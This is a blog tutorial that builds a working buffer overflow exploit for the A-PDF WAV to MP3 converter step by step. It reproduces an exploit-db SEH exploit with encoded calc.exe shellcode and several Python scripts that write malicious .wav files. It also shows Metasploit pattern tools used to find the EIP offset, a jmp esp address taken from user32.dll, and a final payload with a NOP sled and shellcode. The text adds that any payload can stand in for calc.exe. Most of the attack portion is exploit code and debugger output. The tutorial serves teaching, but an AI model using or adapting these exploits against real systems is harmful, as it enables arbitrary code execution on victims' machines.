Tutorial write an exploit Part 1 JMP to ESP

This article begins a small series of tutorials that aims to make you understand in an easier and more detailed way how to build an exploit. The Internet is an inexhaustible source of knowledge and I also want to give my contribution.

In most cases when there is an exploit which takes advantage of a vulnerability, it does not work. This does not mean that there is not the vulnerability but that some small piece of the puzzle was not reassembled correctly. The goal of this first tutorial is to understand in simple steps how these vulnerabilities work, in order to write working exploits according to our needs.

Let’s start with this exploit, which allows a buffer overflow (BOF) of the program a-pdf, a tool to convert WAV to MP3.
The exploit was tested on XP with Service Pack 3. So it doesn’t work on different platform like Win7.

You can download the code below:

#!/usr/bin/env python
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
 
code = (
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47"
"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c"
"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a"
"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45"
"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c"
"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c"
"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c"
"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46"
"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50"
"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44"
"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45"
"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43"
"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b"
"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43"
"\x51\x42\x4c\x42\x43\x43\x30\x41\x41");
 
buff = ("\x41" * 4132);
nops = ("\x90" * 12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);
 
try:
    f1 = open("Dr_IDEs.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

As you could read, the exploit should launch calc.exe, but unfortunately we can only see an application crash on Win7.

But how can we exploit this vulnerability for Win7?

This “simple” question will allow us to understand how the Windows stack works.
Currently what we have to know is that when the CPU loads a program into memory three components are placed:
- Code segment
- Data segment
- Stack segment

Stack section loads and unloads frames, and to perform this function the CPU uses registers.

The most important ones are:
- ESP pointer on the stack
- EBP: pointer to the base of the stack
- EIP: pointer to next instruction
Now I would not go into details which have already been widely discussed on the Internet, refer to Google to fill some gaps in this article.

Stay tuned to our goal we say that there are many techniques of jumping to exploit a BOF. Watching this exploit is clear that it uses a technique called SEH, nevertheless in this tutorial we’ll see how to use a jmp esp.

Firstly we verify that there is actually BOF and the eip is overwritten:

#!/usr/bin/env python
 
# http://www.exploit-db.com/exploits/14681/
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
 
buff = ("\x41" * 5000);
sploit = (buff);
 
try:
    f1 = open("Dr_IDEs2.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

At this point we run the a-pdf application and link the process to OllyDbg.
By converting the newly created file with the exploit we notice that the application crashs and we verify precisely that the EIP is overwritten with all A “\ x41″ in hexadecimal notation:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 41414141
ESP 034DFE90 ASCII "AAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
ESI 41414141
EDI 41414141
EIP 41414141

So the BOF happens, but in order to be used it is necessary to calculate the offset, the right range where the EIP is overwritten. To help us there are some tools in the framework Metasploit:

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3
Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3A [. . .]

We create the pattern and copy the output directly into the exploit:

#!/usr/bin/env python
 
# http://www.exploit-db.com/exploits/14681/
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
 
buff = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab
6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
d4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1A
f2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6A [ . . .]");
sploit = (buff);
 
try:
    f1 = open("Dr_IDEs3.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

Again we check the EIP address:

EAX 00000000
ECX 00001388
EDX 00001388
EBX 35684634
ESP 035DFE90 ASCII "h7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0
Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6F
m7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1F
p2Fp3Fp4F
EBP 31684630
ESI 68463368
EDI 46326846
EIP 46366846

Eip point to 46366846. So to calculate the offset we can use another tool of Metasploit. It takes as input the value just found and the number of bytes which created the BOF.

root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 46366846 5000
4128

Now we know exactly where to overwrite the EIP. We have a structure like this:
[ 4128 bytes BOF ] [ 4 bytes eip ] [ Other bytes where we can put the shellcode ]

We know that once the EIP is overwritten and the flow of execution is captured, there is another register that could be useful to point directly to the shellcode: ESP, or the top of the stack.

Let’s see exactly what happens:

#!/usr/bin/env python
 
# http://www.exploit-db.com/exploits/14681/
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
 
buff = ("\x41" * 4128);
eip = ("\x42" * 4);
shellcode = ("\x43" * 200);
sploit = (buff + eip + shellcode);
 
try:
    f1 = open("Dr_IDEs4.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

In this script we created a BOF with the character “\ x41″, overwrote the EIP with “\ x42″ and injected other code “\ x43″. Analyzing the registers we note that the EIP has been properly overwritten and the ESP contains the character C or “\ x43”. Bingo!

EAX 00000000
ECX 000010EC
EDX 000010EC
EBX 41414141
ESP 035CFE90 ASCII 43,"CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
EBP 41414141
ESI 41414141
EDI 41414141
EIP 42424242

Checking the address to which ESP points, we can see that it was opportunely overwritten with “\x43″.

035CFE90   43434343
035CFE94   43434343
035CFE98   43434343
035CFE9C   43434343
035CFEA0   43434343
035CFEA4   43434343
035CFEA8   43434343
035CFEAC   43434343
035CFEB0   43434343
035CFEB4   43434343
035CFEB8   43434343
035CFEBC   43434343
035CFEC0   43434343
035CFEC4   43434343
035CFEC8   43434343
035CFECC   43434343

Now we replace the characters “\x43″ with a working shellcode and overwrite the EIP with a jmp esp opcode. Thus when the program flow reaches the EIP, it will jump straight to our shellcode. In order to find a jmp esp opcode is necessary to look for the dll of OS and the program that loads at startup.

Hitting on “E” OllyDbg, you can see all DLLs loaded:

Executable modules
Base       Size       Entry      Name       File version      Path
00400000   001EC000   00401000   wavtomp3   1.0.0.0           C:\Program Files\A-PDF Wav to MP3\wavtomp3.exe
10000000   0008C000   10029CF0   lame_enc                     C:\Program Files\A-PDF Wav to MP3\lame_enc.dll
6B7F0000   0030B000   6B83E295   mf         12.0.7600.16385   C:\Windows\System32\mf.dll
6D270000   00072000   6D271576   dsound     6.1.7600.16385 (  C:\Windows\system32\dsound.dll
6D800000   00059000   6D80DB19   MFPlat     12.0.7600.16385   C:\Windows\System32\MFPlat.DLL
6D860000   00198000   6D861291   NetworkE   6.1.7600.16385 (  C:\Windows\system32\NetworkExplorer.dll
6DA00000   0005C000   6DA34A08   Structur   7.00.7600.16385   C:\Windows\System32\StructuredQuery.dll
6DFB0000   00016000   6DFB173D   thumbcac   6.1.7600.16385 (  C:\Windows\system32\thumbcache.dll
707E0000   0009F000   707E18C6   SearchFo   6.1.7600.16385 (  C:\Windows\system32\SearchFolder.dll
70990000   00014000   70991340   msacm32    6.1.7600.16385 (  C:\Windows\system32\msacm32.dll
70B00000   00004000   70B01030   ksuser     6.1.7600.16385 (  C:\Windows\System32\ksuser.dll
70B40000   00032000   70B437C1   winmm      6.1.7600.16385 (  C:\Windows\system32\winmm.dll
70F30000   0002B000   70F4D3FE   ieproxy    8.00.7600.16625   C:\Program Files\Internet Explorer\ieproxy.dll
70FA0000   00058000   70FA15C0   tiptsf     6.1.7600.16385 (  C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
713C0000   0002E000   713C1BBA   SHDOCVW    6.1.7600.16385 (  C:\Windows\system32\SHDOCVW.dll
71480000   0004E000   714B7FAE   actxprxy   6.1.7600.16385 (  C:\Windows\system32\actxprxy.dll
715B0000   0006F000   715B1E41   ntshrui    6.1.7600.16385 (  C:\Windows\system32\ntshrui.dll
71620000   0000B000   71621200   CSCAPI     6.1.7600.16385 (  C:\Windows\system32\CSCAPI.dll
71630000   00009000   716311D0   CSCDLL     6.1.7600.16385 (  C:\Windows\System32\CSCDLL.dll
71640000   0006A000   71641B06   cscui      6.1.7600.16385 (  C:\Windows\System32\cscui.dll
716B0000   00031000   716BA8B6   EhStorSh   6.1.7600.16385 (  C:\Windows\system32\EhStorShell.dll
71880000   0016F000   7188D5F6   explorer   6.1.7600.16385 (  C:\Windows\system32\explorerframe.dll
72340000   00A7E000   72347761   ieframe    8.00.7600.16385   C:\Windows\system32\ieframe.DLL
73410000   0000A000   73414D20   slc        6.1.7600.16385 (  C:\Windows\system32\slc.dll
73440000   00014000   73441DA9   ATL        3.05.2284         C:\Windows\System32\ATL.DLL
736C0000   00021000   736C145E   ntmarta    6.1.7600.16385 (  C:\Windows\system32\ntmarta.dll
73710000   00007000   737110C0   AVRT       6.1.7600.16385 (  C:\Windows\System32\AVRT.dll
737A0000   00025000   737A2B71   POWRPROF   6.1.7600.16385 (  C:\Windows\system32\POWRPROF.dll
737D0000   0003C000   737D3089   OLEACC     7.0.0.0 (win7_rt  C:\Windows\system32\OLEACC.dll
73900000   0000F000   7390125E   samcli     6.1.7600.16385 (  C:\Windows\system32\samcli.dll
73920000   00009000   739215A6   netutils   6.1.7600.16385 (  C:\Windows\system32\netutils.dll
73970000   00007000   73971120   wsock32    6.1.7600.16385 (  C:\Windows\system32\wsock32.dll
73A60000   000FB000   73A71AAE   WindowsC   6.1.7600.16385 (  C:\Windows\system32\WindowsCodecs.dll
73B90000   00013000   73B91D3F   dwmapi     6.1.7600.16385 (  C:\Windows\system32\dwmapi.dll
73BB0000   00039000   73BBE1E6   MMDevApi   6.1.7600.16385 (  C:\Windows\System32\MMDevApi.dll
73C40000   0002F000   73C4C7A2   DUser      6.1.7600.16385 (  C:\Windows\system32\DUser.dll
73C70000   000B2000   73CC16FD   DUI70      6.1.7600.16385 (  C:\Windows\system32\DUI70.dll
73EC0000   00040000   73ECA2DD   uxtheme    6.1.7600.16385 (  C:\Windows\system32\uxtheme.dll
73F00000   000F5000   73F0ADAE   propsys    7.00.7600.16385   C:\Windows\system32\propsys.dll
74000000   00012000   74004795   SAMLIB     6.1.7600.16385 (  C:\Windows\system32\SAMLIB.dll
74040000   0019E000   74073731   comctl32   6.10 (win7_rtm.0  C:\Windows\WinSxS\x86_microsoft.windows.common-
controls_6595b64144ccf1df_6.0.7600.16385_none_421189da2b7fabfc\comctl32.dll
745B0000   00009000   745B1220   version    6.1.7600.16385 (  C:\Windows\system32\version.dll
748D0000   0003B000   748D128D   rsaenh     6.1.7600.16385 (  C:\Windows\system32\rsaenh.dll
74B30000   00016000   74B32DC3   CRYPTSP    6.1.7600.16385 (  C:\Windows\system32\CRYPTSP.dll
74F00000   00019000   74F01319   srvcli     6.1.7600.16385 (  C:\Windows\system32\srvcli.dll
74F70000   00008000   74F710E9   Secur32    6.1.7600.16385 (  C:\Windows\System32\Secur32.dll
74F90000   0001A000   74F92CCD   SSPICLI    6.1.7600.16385 (  C:\Windows\System32\SSPICLI.DLL
74FB0000   0004B000   74FB2B6C   apphelp    6.1.7600.16385 (  C:\Windows\system32\apphelp.dll
75000000   0000C000   750010E1   CRYPTBAS   6.1.7600.16385 (  C:\Windows\system32\CRYPTBASE.dll
750A0000   0000E000   750A1235   RpcRtRem   6.1.7600.16385 (  C:\Windows\system32\RpcRtRemote.dll
750B0000   0000B000   750B1992   profapi    6.1.7600.16385 (  C:\Windows\system32\profapi.dll
75160000   00012000   75161441   DEVOBJ     6.1.7600.16385 (  C:\Windows\system32\DEVOBJ.dll
752A0000   00027000   752A58B9   CFGMGR32   6.1.7600.16385 (  C:\Windows\system32\CFGMGR32.dll
75360000   0004A000   75367A9D   KERNELBA   6.1.7600.16385 (  C:\Windows\system32\KERNELBASE.dll
753B0000   0000A000   753B136C   LPK        6.1.7600.16385 (  C:\Windows\system32\LPK.dll
753C0000   000D4000   754110E5   kernel32   6.1.7600.16385 (  C:\Windows\system32\kernel32.dll
754A0000   00045000   754A11E1   WLDAP32    6.1.7600.16385 (  C:\Windows\system32\WLDAP32.dll
754F0000   000CC000   754F168B   MSCTF      6.1.7600.16385 (  C:\Windows\system32\MSCTF.dll
755C0000   0007B000   755C1AEE   comdlg32   6.1.7600.16385 (  C:\Windows\system32\comdlg32.dll
75640000   0009D000   756747D7   USP10      1.0626.7600.1638  C:\Windows\system32\USP10.dll
756E0000   0008F000   756E3FB1   oleaut32   6.1.7600.16385    C:\Windows\system32\oleaut32.dll
75770000   00019000   75774975   sechost    6.1.7600.16385 (  C:\Windows\SYSTEM32\sechost.dll
757F0000   00035000   757F145D   WS2_32     6.1.7600.16385 (  C:\Windows\system32\WS2_32.dll
75830000   00083000   758323D2   CLBCatQ    2001.12.8530.163  C:\Windows\system32\CLBCatQ.DLL
759C0000   000AC000   759CA472   msvcrt     7.0.7600.16385 (  C:\Windows\system32\msvcrt.dll
75AA0000   0019D000   75AA17E7   SETUPAPI   6.1.7600.16385 (  C:\Windows\system32\SETUPAPI.dll
75C40000   001F9000   75C4224D   iertutil   8.00.7600.16385   C:\Windows\system32\iertutil.dll
75E40000   00C49000   75EBD49A   shell32    6.1.7600.16385 (  C:\Windows\system32\shell32.dll
76A90000   000A1000   76ACAFD4   RPCRT4     6.1.7600.16385 (  C:\Windows\system32\RPCRT4.dll
76B40000   00057000   76B5A24A   SHLWAPI    6.1.7600.16385 (  C:\Windows\system32\SHLWAPI.dll
76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:\Windows\system32\user32.dll
76C70000   0004E000   76C7EC49   GDI32      6.1.7600.16385 (  C:\Windows\system32\GDI32.dll
76E00000   0015C000   76E55D13   ole32      6.1.7600.16385 (  C:\Windows\system32\ole32.dll
76F60000   0013C000              ntdll      6.1.7600.16385 (  C:\Windows\SYSTEM32\ntdll.dll
770B0000   0001F000   770B1355   IMM32      6.1.7600.16385 (  C:\Windows\system32\IMM32.DLL
770D0000   00005000   770D1438   PSAPI      6.1.7600.16385 (  C:\Windows\system32\PSAPI.DLL
770E0000   00006000   770E1782   NSI        6.1.7600.16385 (  C:\Windows\system32\NSI.dll
770F0000   000A0000   77112DD9   advapi32   6.1.7600.16385 (  C:\Windows\system32\advapi32.dll

So we look for the opcode jmp esp in the dll:

76BA0000   000C9000   76BBF7C9   user32     6.1.7600.16385 (  C:\Windows\system32\user32.dll

Double click on dll and then right click we go to “Search for -> All commands -> jmp esp”:

Found commands
Address    Disassembly                               Comment
76BA1000   CMP DWORD PTR DS:[EDI+243276F8],ECX       (Initial CPU selection)
76BC6D53   JMP ESP

So 76BC6D53 is the address with the instruction jmp esp inside user32.dll “\x53\x6d\xbc\x76″ in little endian. However, to make the exploit more reliable as possible is good practice to use dll or exe which are loaded from the program, such as “wavtomp3.exe”.
Now we can add shellcode to launch calc.exe:

# http://www.exploit-db.com/exploits/14681/
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
 
buff = ("\x41" * 4128);
# 76bc6d53
eip = ("\x53\x6d\xbc\x76");
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
"\xc8\x29\x9e");
sploit = (buff + eip + shellcode);
 
try:
    f1 = open("Dr_IDEs5.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

Perfect! We have finished. This is what you’re thinking … but actually the exploit still not work. Analysing with OllyDbg we note that only the 17th character of the shellcode is present in the EIP:

034CFE90  97 FE 4C 03 1B 00 DA 03   —þL.Ú
034CFE98  00 00 00 00 00 00 FF FF   ......ÿÿ
034CFEA0  83 EB FC 31 43 0D 03 43   ƒëü1C.C
034CFEA8  5A 58 0D B7 8C 15 EE 48   ZX.·ŒîH
034CFEB0  4C 46 66 AD 7D 54 1C A5   LFf}T¥
034CFEB8  2F 68 56 EB C3 03 3A 18   /hVëÃ:

So nops “\ x90″ are necessary now in order to switch the code of 16 bytes and to run the shellcode from the beginning:

#!/usr/bin/env python
 
# http://www.exploit-db.com/exploits/14681/
 
#################################################################################
#
# Title:	A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:	Dr_IDE
# Tested On:    XPSP3
# Date:		August 18, 2010
# Download: 	http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:	http://www.exploit-db.com/exploits/14676/
# Usage:	Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################
 
# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
# It Doesn't Work
 
buff = ("\x41" * 4128);
# 76bc6d53
eip = ("\x53\x6d\xbc\x76");
nops = ("\x90" * 16);
shellcode = ("\x33\xc9\xb8\x57\xba\xf8\x4b\xdb\xda\xb1\x33\xd9\x74\x24\xf4"
"\x5b\x83\xeb\xfc\x31\x43\x0d\x03\x43\x5a\x58\x0d\xb7\x8c\x15"
"\xee\x48\x4c\x46\x66\xad\x7d\x54\x1c\xa5\x2f\x68\x56\xeb\xc3"
"\x03\x3a\x18\x50\x61\x93\x2f\xd1\xcc\xc5\x1e\xe2\xe0\xc9\xcd"
"\x20\x62\xb6\x0f\x74\x44\x87\xdf\x89\x85\xc0\x02\x61\xd7\x99"
"\x49\xd3\xc8\xae\x0c\xef\xe9\x60\x1b\x4f\x92\x05\xdc\x3b\x28"
"\x07\x0d\x93\x27\x4f\xb5\x98\x60\x70\xc4\x4d\x73\x4c\x8f\xfa"
"\x40\x26\x0e\x2a\x99\xc7\x20\x12\x76\xf6\x8c\x9f\x86\x3e\x2a"
"\x7f\xfd\x34\x48\x02\x06\x8f\x32\xd8\x83\x12\x94\xab\x34\xf7"
"\x24\x78\xa2\x7c\x2a\x35\xa0\xdb\x2f\xc8\x65\x50\x4b\x41\x88"
"\xb7\xdd\x11\xaf\x13\x85\xc2\xce\x02\x63\xa5\xef\x55\xcb\x1a"
"\x4a\x1d\xfe\x4f\xec\x7c\x95\x8e\x7c\xfb\xd0\x90\x7e\x04\x73"
"\xf8\x4f\x8f\x1c\x7f\x50\x5a\x59\x81\xa1\x57\x74\x15\x18\x02"
"\x35\x78\x9b\xf8\x7a\x84\x18\x09\x03\x73\x00\x78\x06\x38\x86"
"\x90\x7a\x51\x63\x97\x29\x52\xa6\xf4\xac\xc0\x2a\xd5\x4b\x60"
"\xc8\x29\x9e");
sploit = (buff + eip + nops +  shellcode);
 
try:
    f1 = open("Dr_IDEs6.wav","w");	#No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');
 
except:
    print ("[-] Error, could not write the file.");

pwned !

Obviously instead of calc.exe we can put what we want as shown in the video:

The first tutorial finishes here.

See you.
Michele `m7x` Manzotti

References: Corelan.

Related Tags: buffer overflow, esp, exploit, jmp, tutorial, write

Previous Topic: Anche io voglio le scimmie di youtube!

Next Topic: Would you be white hat if it paid more?

One Comment for “Tutorial write an exploit Part 1 JMP to ESP”

Eddie Guerrero scrive:
16 maggio 2011 alle 14:04

Great stuff!!! I’ll try this out in the lab. Keep up the work, many of us are inspired. Hopefully you’ll get around to doing a few to highlight differences in SEH vs ESP vs EIP exploits. I’m fuzzy there, sometimes because you aim to control EIP but when you crash, sometimes your output is not in EIP, it’s in SEH or some other place first, at time of access violation. How to proceed from there, is not always so easy to know how to do. I am clear on this part, jumping ahead and creating NOPs to properly align code that is upcoming in the memory dump, but what about if you need to jump backwards to get the code to line up? If you have a tutorial for that, I’m interested.

Rispondi

Twitter

Do you register at https://t.co/agE9fvnB ? circa 8 ore fa da web Rispondi Retweet Preferiti
...photos, username, or password, as well as any personal information you choose to include in any of your comments, posts, pictures [..]" circa 8 ore fa da web Rispondi Retweet Preferiti
[Privacy] https://t.co/wvTqp86D "[..] We receive and store [..] your first and last name, telephone number, postal or email addresses ... circa 8 ore fa da web Rispondi Retweet Preferiti
Google Service - ClickJacking Vulnerability http://t.co/w2ZvYjnx BTW I like the music! :-) circa 10 ore fa da web Rispondi Retweet Preferiti
JSON CSRF with Parameter Padding http://t.co/1D0kOYTT circa 12 ore fa da web Rispondi Retweet Preferiti

@michelemanzotti

Michele Manzotti